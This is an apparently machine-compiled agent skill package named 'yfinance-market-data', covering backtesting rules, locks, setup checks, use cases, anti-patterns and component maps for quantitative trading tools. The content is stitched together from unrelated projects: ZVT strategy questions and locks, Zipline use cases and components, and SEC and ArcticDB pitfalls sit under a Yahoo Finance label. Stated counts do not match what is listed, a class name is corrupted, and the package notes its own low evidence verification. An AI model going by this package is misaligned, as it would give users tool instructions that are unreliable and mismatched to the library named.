- **`SHARED-BT-COST-001`** <sub>(fatal)</sub>: 交易成本（佣金 + 印花税/转让税 + 过户费）必须在回测初始化时强制配置， 不可使用零成本默认值。忽略成本的回测策略绩效指标具有欺骗性， 高换手率策略尤其严重（单边往返成本往往吞噬 50%+ 的毛收益）。
- **`SHARED-BT-COST-002`** <sub>(high)</sub>: 滑点（Slippage）建模：回测若无滑点，假设每笔订单以理想价格成交， 高频策略在实盘中会因成交价劣化而产生严重亏损。至少应配置固定点差 或比例滑点；大单应使用成交量比例模型（如不超过日成交量 5%）。
- **`SHARED-BT-COST-003`** <sub>(high)</sub>: 换手率（Turnover）必须在回测绩效报告中展示并与成本关联分析。 月换手率超过 50%（年化 600%+）时，策略净收益对成本假设极度敏感， 每 10bps 成本变化可能改变策略盈亏结论，必须做成本敏感性分析。
- **`SHARED-BT-COST-004`** <sub>(medium)</sub>: 仓位规模化（Position Sizing）必须纳入资金量约束：回测应模拟固定资金量 下的实际持仓股数（取整），而非假设可以持有小数股。 对小盘股，最小交易单位（A股：100股/手）会导致实际可持仓量与目标权重 产生偏差，应在回测中模拟取整效应。
- **`SHARED-BT-TIME-001`** <sub>(high)</sub>: 时间戳时区统一：多数据源合并时，UTC vs 本地时间混用是常见数据腐败源。 所有时间戳必须在 pipeline 入口处统一转换为同一时区（推荐 UTC 存储， 市场本地时区展示），不可在 pipeline 中途混用不同时区。
- **`SHARED-BT-TIME-002`** <sub>(high)</sub>: 交易日历对齐：合并不同市场或不同频率数据时（如日线价格 + 周频因子）， 必须使用明确的交易日历进行 reindex/merge，不可使用 outer join 后 fillna， 否则会在非交易日（节假日）创建虚假数据行。
- **`SHARED-BT-TIME-003`** <sub>(high)</sub>: 增量更新边界校验：历史数据增量更新时，必须从数据库查询已存最新日期， 仅下载该日期之后的数据。若重新下载已有数据并追加，会产生时间戳重复行， 导致回测时序错误。更新前后必须校验无重复 (index.duplicated().any() == False)。
- **`SHARED-BT-TIME-004`** <sub>(medium)</sub>: 回测绩效归因失真：基准（Benchmark）选择不当会使 Alpha/Beta 计算失真。 应选用策略实际可投资的被动基准（如 HS300 ETF），而非不可直接投资的 价格指数（如 HS300 指数）。价格指数不含股息再投资，会低估持仓基准收益。
- **`SHARED-BT-PERF-001`** <sub>(medium)</sub>: 最大回撤（Max Drawdown）计算必须使用净值序列（portfolio value）， 不可用累计收益率序列代替。若使用对数收益率累加，会低估回撤深度 （因对数收益率在下跌时会比简单收益率偏小）。
- **`SHARED-BT-PERF-002`** <sub>(medium)</sub>: Sharpe Ratio 年化化约定：年化 Sharpe = 日 Sharpe × sqrt(252)（股票，252 交易日） 或 × sqrt(365)（加密货币，365日）。不同系统默认不同，跨系统对比前必须 确认年化因子，否则 Sharpe 不可比。
- **`SHARED-BT-PERF-003`** <sub>(medium)</sub>: Calmar Ratio / Sortino Ratio 优于 Sharpe Ratio 作为风险调整收益指标： Sharpe 假设收益正态分布，A 股/加密市场的收益分布显著左偏（肥尾）， 会低估下行风险。量化评估应同时报告 Sortino（仅下行波动）和 Calmar（年化收益/最大回撤），不应单一依赖 Sharpe。
- **`SHARED-BT-PERF-004`** <sub>(medium)</sub>: 回测绩效归因应拆解为：alpha（主动收益）、beta（市场收益）、 因子暴露收益（style/sector）和特异性收益（stock selection）。 不做归因的回测无法区分"策略优秀"与"顺风行情恰好 beta 对了"。
- **`SHARED-FR-IC-001`** <sub>(high)</sub>: IC（信息系数）是衡量因子预测能力的核心指标，定义为因子值与 下期收益率的 Spearman 秩相关系数（ICIR = IC / std(IC)）。 IC 绝对值 > 0.05 视为有预测能力的初步证据，ICIR > 0.5 视为稳定。 不计算 IC 直接报告回测绩效是因子有效性证明缺失的典型问题。
- **`SHARED-FR-IC-002`** <sub>(high)</sub>: IC 衰减（IC Decay）分析：因子预测能力通常随持仓期增长而衰减。 应计算 1/5/10/20 日 IC 序列，识别因子的最优持仓期。 IC 在1日高但20日迅速衰减的因子是短期因子，不适合月度换仓策略； 反之亦然。使用错误的持仓期会严重损害因子实盘表现。
- **`SHARED-FR-IC-003`** <sub>(high)</sub>: Harvey, Liu & Zhu (2016) 警告：学术界已发现 300+ 个"显著"因子， 其中大量是多重检验下的误发现（False Discovery）。因子有效性要求： t-stat > 3.0（而非传统的 1.96）；或在不同时段/市场独立复现； 或有清晰的经济学逻辑。不满足上述条件的因子极可能是数据挖掘产物。
- **`SHARED-FR-IC-004`** <sub>(high)</sub>: 因子换手率（Factor Turnover）控制：高 IC 但高换手率的因子，在扣除 交易成本后净 IC 可能为负。应计算换手率调整后的有效 IC： net_IC = IC - turnover × cost_per_turn。目标换手率 ≤ 50%（月频）。
- **`SHARED-FR-IC-005`** <sub>(medium)</sub>: 因子衰减期（Half-life）是因子信号强度的核心参数，直接决定最优再平衡频率。 半衰期 < 5 日：日频或周频换仓；5-20 日：周频或双周；> 20 日：月频换仓。 错误地对短期因子使用月频换仓，会导致大量 alpha 在持仓期内消散。
- **`SHARED-FR-NEUT-001`** <sub>(high)</sub>: 行业中性化（Industry Neutralization）：因子值若不对行业均值中性化， 因子收益中会混入行业轮动收益，难以判断是因子本身还是行业暴露驱动了收益。 行业中性化操作：factor_neutral = factor - industry_mean(factor)。
- **`SHARED-FR-NEUT-002`** <sub>(high)</sub>: 市值中性化（Market Cap Neutralization）：小盘股效应（小盘跑赢大盘） 是金融史上最持久的 anomaly 之一，会污染几乎所有未中性化的因子。 若因子与市值高度相关，选股会系统性偏向小盘，收益来自市值暴露而非因子本身。 需同时进行行业和市值中性化（Fama-MacBeth 回归或残差法）。
- **`SHARED-FR-NEUT-003`** <sub>(high)</sub>: 异常值处理（Winsorize/MAD）：因子原始值通常含有极端值，极端值会扭曲 分组分析（如 Q1/Q10 十分位）。应对原始因子值做 Winsorize（截尾至 [1%, 99%] 或 3-sigma）或 MAD（中位数绝对偏差）缩尾，然后再排名/中性化。
- **`SHARED-FR-NEUT-004`** <sub>(medium)</sub>: 因子正交化（Factor Orthogonalization）：当多个因子共同用于合成打分时， 高相关因子的合成等效于对单一因子过度权重，稀释信号多样性。 应在合成前对因子做施密特正交化或 PCA，消除因子间的多重共线性。
- **`SHARED-FR-NEUT-005`** <sub>(medium)</sub>: 缺失数据填充策略：因子计算中的 NaN（停牌/新股/数据缺口）若用截面均值填充 会引入 lookahead bias（均值本身含未来信息）；若完全删除会产生幸存者偏差； 正确做法是用截面中位数（当日所有股票的中位数，不依赖未来）或将该股当日排除。
- **`SHARED-FR-PORT-001`** <sub>(high)</sub>: 分层分析（Quantile Analysis）：因子评估应使用 Q1/Q5（五分位）或 Q1/Q10（十分位）分组的多空收益差（top minus bottom spread）作为 主要评估指标，而非简单的多头收益。Q1 多 Q5 空的"单调性"检验是 因子有效性的核心证据：单调递增/递减 > 非单调 >> 仅多头有效。
- **`SHARED-FR-PORT-002`** <sub>(medium)</sub>: Alpha 衰减测试（Alpha Decay Test）：因子的月度 IC 在不同时段（牛市/熊市/ 震荡市）的稳定性是因子鲁棒性的重要证据。IC 仅在某个特定市场状态下有效 的因子不适合全天候部署；应分段（rolling 12M）展示 IC 时序， 识别因子失效期。
- **`SHARED-FR-PORT-003`** <sub>(medium)</sub>: 换仓成本感知（Turnover-Aware Selection）：因子排名靠近中间地带（49-51 分位） 的股票，排名小幅波动就会触发换仓，产生大量无效交易成本。 应在选股时设置换仓缓冲区（buffer zone）：只在排名变化超过阈值时才换仓。
- **`SHARED-FR-PORT-004`** <sub>(medium)</sub>: 分组收益的统计显著性（Bootstrap 检验）：因子分层收益差（Q1-Q5 spread） 即使在历史数据上很大，也可能是偶然，需要 bootstrap 或 t-test 检验 显著性（p-value < 0.05）。小样本回测期（< 3年）的分层收益尤其不可靠。
- **`SHARED-FR-XFER-001`** <sub>(high)</sub>: 因子跨市场可移植性验证：在一个市场有效的因子，不必然在另一个市场有效。 将美股因子直接套用 A 股、或将股票因子套用期货/加密货币，需要独立 IC 验证， 不可假设跨市场通用性。A 股特有异象（如反转效应、ST 价格异常）不存在于美股。
- **`SHARED-FR-XFER-002`** <sub>(medium)</sub>: 因子有效性时间稳定性：曾经有效的因子会因市场学习和套利行为逐渐失效 （McLean & Pontiff 2016 证明因子发表后平均衰减 58%）。 应定期（每季度/年）重新评估因子 IC，失效因子应及时替换或降权。
- **`SHARED-FR-XFER-003`** <sub>(medium)</sub>: 因子与宏观经济环境的交互：利率周期/经济周期/市场情绪对因子有效性影响显著。 价值因子（低 P/B）在利率上升期更有效；动量因子在趋势市更有效，震荡市失效。 部署因子前应评估当前宏观环境与因子最优生存环境的匹配度。

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **3**

## `KUC-101`
**Source**: `docs/deploy.py`

Automates the process of building and deploying Zipline documentation by cleaning old artifacts, moving files to temporary locations, and preparing docs for publication.

## `KUC-102`
**Source**: `docs/notebooks/tutorial.ipynb`

Provides an interactive tutorial for new Zipline users to learn the platform's core concepts including data ingestion, algorithm execution via CLI and magic commands, and performance visualization.

## `KUC-103`
**Source**: `src/zipline/examples/buyapple.ipynb`

Demonstrates a minimal Zipline algorithm that places consistent buy orders for a single stock and records price data for later analysis, serving as a starter template for custom algorithms.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **10**

## `CW-BT-001` — Cerebro 统一编排引擎
**From**: backtrader · **Applicable to**: backtesting

backtrader 用 Cerebro 作为单一入口，统一管理 data feeds、strategies、analyzers、 observers 的生命周期，支持一次 cerebro.run() 跑多策略+多数据源。 zvt 的 StockTrader 目前每次实例化只绑定一套因子，缺乏统一的多策略组合编排层； 借鉴 Cerebro 模式可让用户把多个 Trader 实例组合到一个 runner 中对比评估。

## `CW-BT-002` — Analyzer 插件化绩效评估
**From**: backtrader · **Applicable to**: backtesting

backtrader 提供 SharpeRatio、DrawDown、TimeReturn、TradeAnalyzer 等即插即用 的 Analyzer，可在不修改策略代码的情况下附加任意绩效指标。 zvt 当前绩效评估能力较弱，没有标准化的 Analyzer 接口； 借鉴此模式可让用户 cerebro.addanalyzer(SharpeRatio) 即得风险调整收益报告。

## `CW-BT-003` — Sizer 仓位管理分离
**From**: backtrader · **Applicable to**: backtesting

backtrader 将仓位管理（每次开仓买多少股/多大比例）单独抽象为 Sizer， 与信号逻辑完全解耦；内置 FixedSize、PercentSizer 等，用户可自定义。 zvt 目前没有显式的 Sizer 概念，仓位控制逻辑散落在 Trader.on_profit_control 等钩子中； 引入 Sizer 接口可使策略信号与资金管理规则独立演化和组合复用。

## `CW-BT-004` — Order 类型全集（Limit/Stop/OCO/Bracket）
**From**: backtrader · **Applicable to**: backtesting

backtrader 支持 Market、Limit、Stop、StopLimit、OCO（二选一）、 Bracket（止盈止损一对订单）等丰富订单类型，并模拟成交滑点和手续费方案。 zvt 回测目前主要支持市价成交，缺乏限价委托和组合订单模拟； 对于高频或实盘对接场景，完善订单类型将大幅提升回测真实性。

## `CW-BT-005` — 数据重采样与重播（Resampling & Replaying）
**From**: backtrader · **Applicable to**: backtesting

backtrader 可将低级别数据（如 1 min）实时 resample 为高级别（如 1 day）并同步驱动策略， 或 replay 逐 tick 模拟 OHLC 形成过程，实现日内精细回测。 zvt 目前多时间框架通过预录入不同级别 K 线实现，缺少运行时动态重采样； 借鉴此模式可在不重复录入数据的前提下支持任意时间粒度组合回测。

## `CW-VN-003` — CTA 回测引擎内置可视化
**From**: vnpy · **Applicable to**: backtesting

vnpy 的 cta_backtester 提供图形界面直接展示策略净值曲线、最大回撤、 每日盈亏、成交明细，无需 Jupyter Notebook。 zvt 目前回测结果可视化依赖 draw_result 方法调用 Plotly，但无统一的回测报告页面； 借鉴此模式可打包一个开箱即用的策略绩效仪表盘。

## `CW-VN-004` — vnpy.alpha ML 因子研究实验室（Lab）
**From**: vnpy · **Applicable to**: factor-research

vnpy 4.0 的 vnpy.alpha.lab 提供数据管理、模型训练、信号生成、策略回测一体化工作流， 支持 Lasso/LightGBM/MLP 等算法的标准化训练接口和可视化对比。 zvt 的 ML 能力目前仅有 MaStockMLMachine 一个入口，缺乏规范化 Lab 框架； 借鉴 Lab 模式可建立"特征工程→训练→信号→回测"的标准流水线，降低 ML 实验门槛。

## `CW-QL-001` — Point-in-Time 数据库（防未来数据泄漏）
**From**: qlib · **Applicable to**: backtesting

qlib 的 Point-in-Time Provider 保证在给定时间点 t 的查询只返回 t 时刻 真实可知的数据（财报发布延迟、修订历史均被正确处理）， 彻底消除回测中的 look-ahead bias。 zvt 目前财务数据以报告期为 timestamp，缺少"发布日"维度， 存在用未来财报数据做选股的潜在偏差；引入 PIT 模式可大幅提升回测可信度。

## `CW-QL-002` — Recorder + Experiment 实验管理（MLflow 风格）
**From**: qlib · **Applicable to**: factor-research

qlib 的 workflow 模块提供 Experiment/Recorder，自动记录每次模型训练的 超参数、特征、指标、预测结果，支持跨实验比较和模型版本管理。 zvt 目前缺乏 ML 实验追踪机制，每次重跑结果会覆盖前次； 借鉴 Recorder 模式可将每次因子实验的参数和结果持久化，支持快速复现和版本对比。

## `CW-QL-003` — Nested Decision Framework（多层嵌套决策执行）
**From**: qlib · **Applicable to**: backtesting

qlib 支持将高频执行层（分钟级委托拆单）嵌套在低频决策层（日级组合调仓）中， 两层独立优化且可组合运行，实现日内最优执行算法（如 TWAP、VWAP 调仓）。 zvt 目前回测仅有日线级别的成交假设，缺乏执行算法建模； 借鉴嵌套框架可让 zvt 区分"何时持有哪些股"与"如何以最小冲击成本建仓"两个问题。

FILE:references/components/asset_management.md
# asset_management (4 classes)

## `AssetFinder.lookup_symbol`
`asset_management/assetfinder-lookup-symbol.py:0`

## `AssetFinder.retrieve_asset`
`asset_management/assetfinder-retrieve-asset.py:0`

## `create_continuous_future`
`asset_management/create-continuous-future.py:0`

## `roll_strategy`
`asset_management/roll-strategy.py:0`

FILE:references/components/data_access_layer.md
# data_access_layer (5 classes)

## `DataPortal.get_spot_value`
`data_access_layer/dataportal-get-spot-value.py:0`

## `DataPortal.get_history_window`
`data_access_layer/dataportal-get-history-window.py:0`

## `DataPortal.get_adjustments`
`data_access_layer/dataportal-get-adjustments.py:0`

## `bar_reader`
`data_access_layer/bar-reader.py:0`

## `adjustment_reader`
`data_access_layer/adjustment-reader.py:0`

FILE:references/components/data_ingestion-bundles.md
# data_ingestion/bundles (3 classes)

## `ingest`
`data_ingestion/bundles/ingest.py:0`

## `bundle_ingest`
`data_ingestion/bundles/bundle-ingest.py:0`

## `bar_format`
`data_ingestion/bundles/bar-format.py:0`

FILE:references/components/fx-currency_conversion.md
# fx/currency_conversion (2 classes)

## `FXRateReader.get_rates`
`fx/currency_conversion/fxratereader-get-rates.py:0`

## `fx_reader`
`fx/currency_conversion/fx-reader.py:0`

FILE:references/components/order_management_-_execution.md
# order_management_&_execution (6 classes)

## `SimulationBlotter.order`
`order_management_&_execution/simulationblotter-order.py:0`

## `Blotter.cancel`
`order_management_&_execution/blotter-cancel.py:0`

## `SlippageModel.calculate_fill`
`order_management_&_execution/slippagemodel-calculate-fill.py:0`

## `slippage_model`
`order_management_&_execution/slippage-model.py:0`

## `commission_model`
`order_management_&_execution/commission-model.py:0`

## `cancel_policy`
`order_management_&_execution/cancel-policy.py:0`

FILE:references/components/pipeline_computation_engine.md
# pipeline_computation_engine (5 classes)

## `SimplePipelineEngine.run_pipeline`
`pipeline_computation_engine/simplepipelineengine-run-pipeline.py:0`

## `Pipeline藤`
`pipeline_computation_engine/pipeline.py:0`

## `USEquityPricing.close`
`pipeline_computation_engine/usequitypricing-close.py:0`

## `pipeline_loader`
`pipeline_computation_engine/pipeline-loader.py:0`

## `execution_engine`
`pipeline_computation_engine/execution-engine.py:0`

FILE:references/components/portfolio_accounting_-_metrics.md
# portfolio_accounting_&_metrics (4 classes)

## `Ledger.process_transaction`
`portfolio_accounting_&_metrics/ledger-process-transaction.py:0`

## `Ledger.earn_dividends`
`portfolio_accounting_&_metrics/ledger-earn-dividends.py:0`

## `MetricsTracker.record`
`portfolio_accounting_&_metrics/metricstracker-record.py:0`

## `metrics_set`
`portfolio_accounting_&_metrics/metrics-set.py:0`

FILE:references/components/trading_simulation.md
# trading_simulation (5 classes)

## `TradingAlgorithm.run`
`trading_simulation/tradingalgorithm-run.py:0`

## `TradingAlgorithm.order`
`trading_simulation/tradingalgorithm-order.py:0`

## `TradingAlgorithm.schedule_function`
`trading_simulation/tradingalgorithm-schedule-function.py:0`

## `simulation_clock`
`trading_simulation/simulation-clock.py:0`

## `blotter_class`
`trading_simulation/blotter-class.py:0`

ClawHub DevOps Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Yfinance Market Data

Skill

通过 Yahoo Finance 获取全球多市场股票、指数、外汇及加密货币的历史行情、财务数据、实时报价和财务日历。

---
name: yfinance-market-data
description: |-
  通过 Yahoo Finance 获取全球多市场股票、指数、外汇及加密货币的历史行情、财务数据、实时报价和财务日历。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-128"
  compiled_at: "2026-04-22T13:01:04.148127+00:00"
  capability_markets: "multi-market"
  capability_activities: "data-sourcing"
  sop_version: "crystal-compilation-v6.1"
---
# yfinance 行情数据 (yfinance-market-data)

> 通过 Yahoo Finance 获取全球多市场股票、指数、外汇及加密货币的历史行情、财务数据、实时报价和财务日历。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (12 total)

### Utility Function Validation (`UC-101`)
Ensures date/timezone parsing and validation utilities work correctly for handling mixed timezone data from financial APIs
**Triggers**: timezone, datetime, validation

### Historical Price Data Retrieval (`UC-105`)
Fetches historical price and volume data for securities across multiple intervals (daily, weekly, monthly) and time periods
**Triggers**: price history, historical data, OHLCV

### Price Data Repair and Resampling (`UC-107`)
Corrects corrupted or misaligned price data and resamples data between different time intervals while maintaining data integrity
**Triggers**: repair, fix data, resample

For all **12** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (14 total)

- **`AP-DATA-SOURCING-001`**: Missing or invalid User-Agent headers for SEC API requests
- **`AP-DATA-SOURCING-002`**: Ignoring external API rate limits causing IP blocking
- **`AP-DATA-SOURCING-003`**: No HTTP timeout configuration causing indefinite hangs

All 14 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-128. Evidence verify ratio = 29.8% and audit fail total = 3. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 14 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-128` blueprint at 2026-04-22T13:01:04.148127+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Ticker Symbol Search', 'Stock Screener Query Execution', 'Utility Function Validation', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **14**

## finance-bp-070--edgartools (2)

### `AP-DATA-SOURCING-004` — Invalidating XBRL period types for balance sheet analysis <sub>(high)</sub>

Balance sheets represent point-in-time snapshots (instant periods), not ranges (duration periods). Using duration periods for balance sheet statements causes stockholder equity and other line items to show nonsensical date ranges, corrupting financial calculations that depend on accurate period associations.

### `AP-DATA-SOURCING-012` — Large document parsing without streaming causing OOM errors <sub>(high)</sub>

SEC filings can exceed 160MB, and parsing large documents in memory without streaming causes OOM errors that crash the entire service for all users. Documents exceeding 10MB require switching to streaming parsers to prevent extreme memory usage.

## finance-bp-070--edgartools, finance-bp-079--akshare, finance-bp-084--eastmoney, finance-bp-114--edgar-crawler (1)

### `AP-DATA-SOURCING-002` — Ignoring external API rate limits causing IP blocking <sub>(high)</sub>

Multiple financial data sources (SEC EDGAR, Sina, Eastmoney, TuShare) enforce strict rate limits (10 req/sec, 120 calls/minute). Exceeding these triggers temporary IP blocks lasting 10-60 minutes, causing complete data unavailability. Immediate retry attempts during blocks extend the block duration significantly.

## finance-bp-070--edgartools, finance-bp-114--edgar-crawler (1)

### `AP-DATA-SOURCING-001` — Missing or invalid User-Agent headers for SEC API requests <sub>(high)</sub>

SEC EDGAR requires valid User-Agent identity with contact information in headers. Without this, requests are rejected with 403 Forbidden errors, completely blocking all filing access. Both edgartools and edgar-crawler enforce this constraint as fundamental to any data retrieval operation.

## finance-bp-079--akshare (4)

### `AP-DATA-SOURCING-003` — No HTTP timeout configuration causing indefinite hangs <sub>(high)</sub>

HTTP requests to external financial data sources (Yahoo, Sina, Eastmoney) without timeout values can hang indefinitely on blocked connections. This freezes the entire application and prevents data collection from all other sources, creating cascading failures across the system.

### `AP-DATA-SOURCING-005` — Malformed or empty JSON responses causing silent failures <sub>(medium)</sub>

Financial API responses containing malformed JSON raise unhandled ValueError exceptions, crashing downstream processing. Similarly, empty JSON responses (empty dict, list, null) masquerading as valid data cause silent failures producing empty DataFrames or misleading results in financial analysis.

### `AP-DATA-SOURCING-006` — Source-specific symbol mapping errors causing data corruption <sub>(high)</sub>

Stock symbols require source-specific formatting (sh/sz prefixes for Sina, numeric codes for THS, etc.). Incorrect symbol mapping causes API calls to return empty results or wrong data, corrupting financial datasets with missing records or entirely incorrect tickers being stored.

### `AP-DATA-SOURCING-013` — Column mapping length mismatch causing DataFrame errors <sub>(medium)</sub>

Column mapping constants with length mismatch against actual API response columns cause ValueError exceptions during DataFrame construction. Raw field names (f1, f2, f12) must be mapped to meaningful names (最新价, 涨跌幅) with exact column count alignment.

## finance-bp-103--ArcticDB (3)

### `AP-DATA-SOURCING-007` — Using unsupported DataFrame types with time-series storage <sub>(high)</sub>

ArcticDB does not support MultiIndex columns, PyArrow-backed pandas DataFrames, or timedelta64 columns. Attempting to write these DataFrame types raises ArcticDbNotYetImplemented exceptions, causing write failures and permanent data loss if not properly handled before storage operations.

### `AP-DATA-SOURCING-008` — Non-atomic storage writes causing concurrent access corruption <sub>(high)</sub>

Storage backends without atomic write_if_none operations can cause data corruption under concurrent multi-writer access. Similarly, updating reference keys before atom keys complete allows readers to access incomplete or missing data, breaking version chain integrity.

### `AP-DATA-SOURCING-014` — Pruning snapshot-protected versions breaking point-in-time recovery <sub>(high)</sub>

Deleting or pruning versions that are referenced by existing snapshots breaks historical data access. Snapshots provide point-in-time recovery capabilities, and removing their referenced versions causes read failures when users attempt to access data from specific snapshots.

## finance-bp-114--edgar-crawler (1)

### `AP-DATA-SOURCING-010` — 8-K filing item numbering scheme mismatch for historical filings <sub>(medium)</sub>

8-K filings use obsolete item numbering (1-12) before 2004-08-23 and new numbering (1.01-9.01) after. Using the wrong numbering scheme causes no matches for historical filings, resulting in empty item sections and complete extraction failure for pre-2004 data.

## finance-bp-128--yfinance (2)

### `AP-DATA-SOURCING-009` — Missing timezone-aware DatetimeIndex causing DST offset errors <sub>(high)</sub>

Price history DataFrames returned without timezone-aware DatetimeIndex cause incorrect timestamp interpretation when combined with other timezone-aware data. This leads to 23-25 hour offset errors during daylight saving time transitions, corrupting historical price calculations.

### `AP-DATA-SOURCING-011` — Yahoo Finance missing crumb authentication causing 401/403 errors <sub>(high)</sub>

Yahoo Finance API requires crumb and cookie authentication with every request. Without proper crumb management, API calls return 401 Unauthorized or HTML error pages instead of JSON data, breaking all downstream price and financial data processing.

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-128--yfinance
**Scan date**: 2026-04-22
**Stats**: {'total_files': 9, 'total_classes': 46, 'total_functions': 0, 'total_stages': 9}

## Modules (9)

- [http_&_session_management](components/http_-_session_management.md): 4 classes
- [price_history_retrieval_&_repair](components/price_history_retrieval_-_repair.md): 7 classes
- [quote_&_financial_analysis](components/quote_-_financial_analysis.md): 5 classes
- [ticker_facade](components/ticker_facade.md): 8 classes
- [batch_download_orchestration](components/batch_download_orchestration.md): 4 classes
- [domain_entities_(sector/industry)](components/domain_entities_-sector-industry.md): 5 classes
- [stock_screener](components/stock_screener.md): 4 classes
